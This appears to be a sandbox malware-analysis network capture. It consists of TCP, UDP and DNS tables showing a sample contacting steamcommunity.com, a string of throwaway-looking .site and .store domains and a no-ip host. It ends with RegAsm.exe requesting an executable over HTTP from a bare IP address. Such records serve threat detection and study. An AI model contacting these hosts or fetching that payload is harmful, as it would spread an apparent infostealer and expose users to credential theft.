                                                                                                                                                      Oct 3, 2024 09:16:45.669867992 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.669886112 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.774831057 CEST49746443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.774879932 CEST4434974649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.780962944 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.781014919 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.781112909 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.790424109 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:45.790462971 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.922589064 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.922882080 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.924809933 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.924839973 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.925156116 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.926685095 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.926685095 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:45.926765919 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376250029 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376348972 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376415968 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376635075 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376651049 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.376663923 CEST49748443192.168.2.6188.114.96.3
                                                                                                                                                      Oct 3, 2024 09:16:46.376669884 CEST44349748188.114.96.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.393914938 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.393964052 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.394041061 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.394406080 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.394418955 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.483814955 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.483947992 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.484462976 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.484478951 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.486326933 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:46.486336946 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.889791012 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.889929056 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.891808033 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.891819000 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.892050982 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.893311977 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.893328905 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:46.893362999 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.231856108 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.231935024 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.231950045 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.232011080 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.232172966 CEST49749443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:47.232196093 CEST4434974949.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.289664030 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298247099 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.298365116 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298543930 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.298594952 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:47.304713964 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304833889 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304841995 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.304856062 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369812965 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369913101 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.369995117 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370299101 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370317936 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.370328903 CEST49750443192.168.2.6172.67.152.190
                                                                                                                                                      Oct 3, 2024 09:16:47.370335102 CEST44349750172.67.152.190192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.393949032 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.393985033 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.394078970 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.394500017 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.394510984 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.877446890 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.877599955 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.879578114 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.879591942 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.879853964 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.881274939 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.881314039 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:47.881350994 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:48.158515930 CEST804975145.132.206.251192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:48.158642054 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:49.332487106 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.332582951 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.332689047 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333045959 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333071947 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.333086967 CEST49752443192.168.2.6104.21.84.18
                                                                                                                                                      Oct 3, 2024 09:16:49.333093882 CEST44349752104.21.84.18192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.352547884 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.352590084 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.352807999 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.353275061 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.353286028 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.860117912 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.860301018 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.862111092 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.862122059 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.862415075 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.863737106 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.863737106 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:49.863827944 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.284297943 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.284395933 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.286185980 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295810938 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295810938 CEST49753443192.168.2.6104.21.18.193
                                                                                                                                                      Oct 3, 2024 09:16:50.295839071 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.295850992 CEST44349753104.21.18.193192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.311708927 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.311753035 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.311856031 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.312273026 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.312285900 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.829246998 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.829425097 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.831257105 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.831281900 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.831595898 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.832876921 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.832914114 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:50.832963943 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296338081 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296566963 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.296627045 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312666893 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312696934 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.312714100 CEST49754443192.168.2.6104.21.21.3
                                                                                                                                                      Oct 3, 2024 09:16:51.312721014 CEST44349754104.21.21.3192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.357254982 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357279062 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.357351065 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357914925 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.357928038 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.878905058 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.879055977 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.881269932 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.881283045 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.881527901 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.882891893 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.882914066 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:51.883094072 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.103247881 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:52.103337049 CEST4975180192.168.2.645.132.206.251
                                                                                                                                                      Oct 3, 2024 09:16:52.326694012 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.326798916 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.326920986 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:52.327028036 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:52.327054024 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.327096939 CEST49755443192.168.2.6104.21.17.174
                                                                                                                                                      Oct 3, 2024 09:16:52.327104092 CEST44349755104.21.17.174192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.361382008 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:52.361432076 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.361511946 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:52.361881971 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:52.361901045 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.037693977 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.037985086 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.042455912 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.042469978 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.042789936 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.044418097 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.087414980 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.813446045 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.813482046 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.813520908 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.813524961 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.813559055 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.813576937 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.813576937 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.813630104 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.899493933 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.899527073 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.899688959 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.899707079 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.899753094 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900460958 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.900520086 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900526047 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.900566101 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900577068 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.900619984 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900660992 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900674105 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.900685072 CEST49756443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:53.900690079 CEST44349756104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.917646885 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:53.917689085 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.917774916 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:53.918247938 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:53.918262959 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.422528982 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.422637939 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.424443960 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.424460888 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.424736023 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.426085949 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.426116943 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.426172972 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.882174969 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.882275105 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.882364988 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.882535934 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.882556915 CEST44349757104.21.16.12192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:54.882569075 CEST49757443192.168.2.6104.21.16.12
                                                                                                                                                      Oct 3, 2024 09:16:54.882576942 CEST44349757104.21.16.12192.168.2.6

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Oct 3, 2024 09:16:06.253133059 CEST5032753192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:06.260792971 CEST53503271.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.433969021 CEST5395053192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:44.444590092 CEST53539501.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:44.478276014 CEST6550753192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:44.489936113 CEST53655071.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:45.430241108 CEST5304253192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:45.450474024 CEST53530421.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:46.380069017 CEST5811853192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:46.392647982 CEST53581181.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.244087934 CEST6166253192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:47.288543940 CEST53616621.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:47.376100063 CEST6522653192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:47.392729044 CEST53652261.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:49.334786892 CEST5902353192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:49.349245071 CEST53590231.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:50.297621965 CEST5109653192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:50.310775995 CEST53510961.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:51.323426962 CEST5997853192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:51.356293917 CEST53599781.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:52.332473993 CEST5278353192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:52.360306025 CEST53527831.1.1.1192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:53.902718067 CEST6156653192.168.2.61.1.1.1
                                                                                                                                                      Oct 3, 2024 09:16:53.916512966 CEST53615661.1.1.1192.168.2.6

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Oct 3, 2024 09:16:06.253133059 CEST192.168.2.61.1.1.10x679eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:44.433969021 CEST192.168.2.61.1.1.10x5eabStandard query (0)chorusarorp.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:44.478276014 CEST192.168.2.61.1.1.10xbf30Standard query (0)questionsmw.storeA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:45.430241108 CEST192.168.2.61.1.1.10x54f0Standard query (0)soldiefieop.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:46.380069017 CEST192.168.2.61.1.1.10xf7e6Standard query (0)abnomalrkmu.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:47.244087934 CEST192.168.2.61.1.1.10x9aeaStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:47.376100063 CEST192.168.2.61.1.1.10xd089Standard query (0)treatynreit.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:49.334786892 CEST192.168.2.61.1.1.10xc135Standard query (0)snarlypagowo.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:50.297621965 CEST192.168.2.61.1.1.10x4f10Standard query (0)mysterisop.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:51.323426962 CEST192.168.2.61.1.1.10xc04Standard query (0)absorptioniw.siteA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:52.332473993 CEST192.168.2.61.1.1.10x6699Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:53.902718067 CEST192.168.2.61.1.1.10x717Standard query (0)gravvitywio.storeA (IP address)IN (0x0001)false

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Oct 3, 2024 09:16:06.260792971 CEST1.1.1.1192.168.2.60x679eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:44.444590092 CEST1.1.1.1192.168.2.60x5eabName error (3)chorusarorp.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:44.489936113 CEST1.1.1.1192.168.2.60xbf30No error (0)questionsmw.store172.67.208.141A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:44.489936113 CEST1.1.1.1192.168.2.60xbf30No error (0)questionsmw.store104.21.77.132A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:45.450474024 CEST1.1.1.1192.168.2.60x54f0No error (0)soldiefieop.site188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:45.450474024 CEST1.1.1.1192.168.2.60x54f0No error (0)soldiefieop.site188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:46.392647982 CEST1.1.1.1192.168.2.60xf7e6No error (0)abnomalrkmu.site172.67.152.190A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:46.392647982 CEST1.1.1.1192.168.2.60xf7e6No error (0)abnomalrkmu.site104.21.56.150A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:47.288543940 CEST1.1.1.1192.168.2.60x9aeaNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:47.392729044 CEST1.1.1.1192.168.2.60xd089No error (0)treatynreit.site104.21.84.18A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:47.392729044 CEST1.1.1.1192.168.2.60xd089No error (0)treatynreit.site172.67.184.196A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:49.349245071 CEST1.1.1.1192.168.2.60xc135No error (0)snarlypagowo.site104.21.18.193A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:49.349245071 CEST1.1.1.1192.168.2.60xc135No error (0)snarlypagowo.site172.67.183.74A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:50.310775995 CEST1.1.1.1192.168.2.60x4f10No error (0)mysterisop.site104.21.21.3A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:50.310775995 CEST1.1.1.1192.168.2.60x4f10No error (0)mysterisop.site172.67.195.67A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:51.356293917 CEST1.1.1.1192.168.2.60xc04No error (0)absorptioniw.site104.21.17.174A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:51.356293917 CEST1.1.1.1192.168.2.60xc04No error (0)absorptioniw.site172.67.177.186A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:52.360306025 CEST1.1.1.1192.168.2.60x6699No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:53.916512966 CEST1.1.1.1192.168.2.60x717No error (0)gravvitywio.store104.21.16.12A (IP address)IN (0x0001)false
                                                                                                                                                      Oct 3, 2024 09:16:53.916512966 CEST1.1.1.1192.168.2.60x717No error (0)gravvitywio.store172.67.209.193A (IP address)IN (0x0001)false

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • steamcommunity.com
                                                                                                                                                      • 49.12.197.9
                                                                                                                                                      • questionsmw.store
                                                                                                                                                      • soldiefieop.site
                                                                                                                                                      • abnomalrkmu.site
                                                                                                                                                      • treatynreit.site
                                                                                                                                                      • snarlypagowo.site
                                                                                                                                                      • mysterisop.site
                                                                                                                                                      • absorptioniw.site
                                                                                                                                                      • gravvitywio.store
                                                                                                                                                      • 147.45.44.104
                                                                                                                                                      • cowod.hopto.org

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.649745147.45.44.104806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Oct 3, 2024 09:16:42.795058012 CEST189OUTGET /ldms/66fe13d251bbf_lsod.exe HTTP/1.1
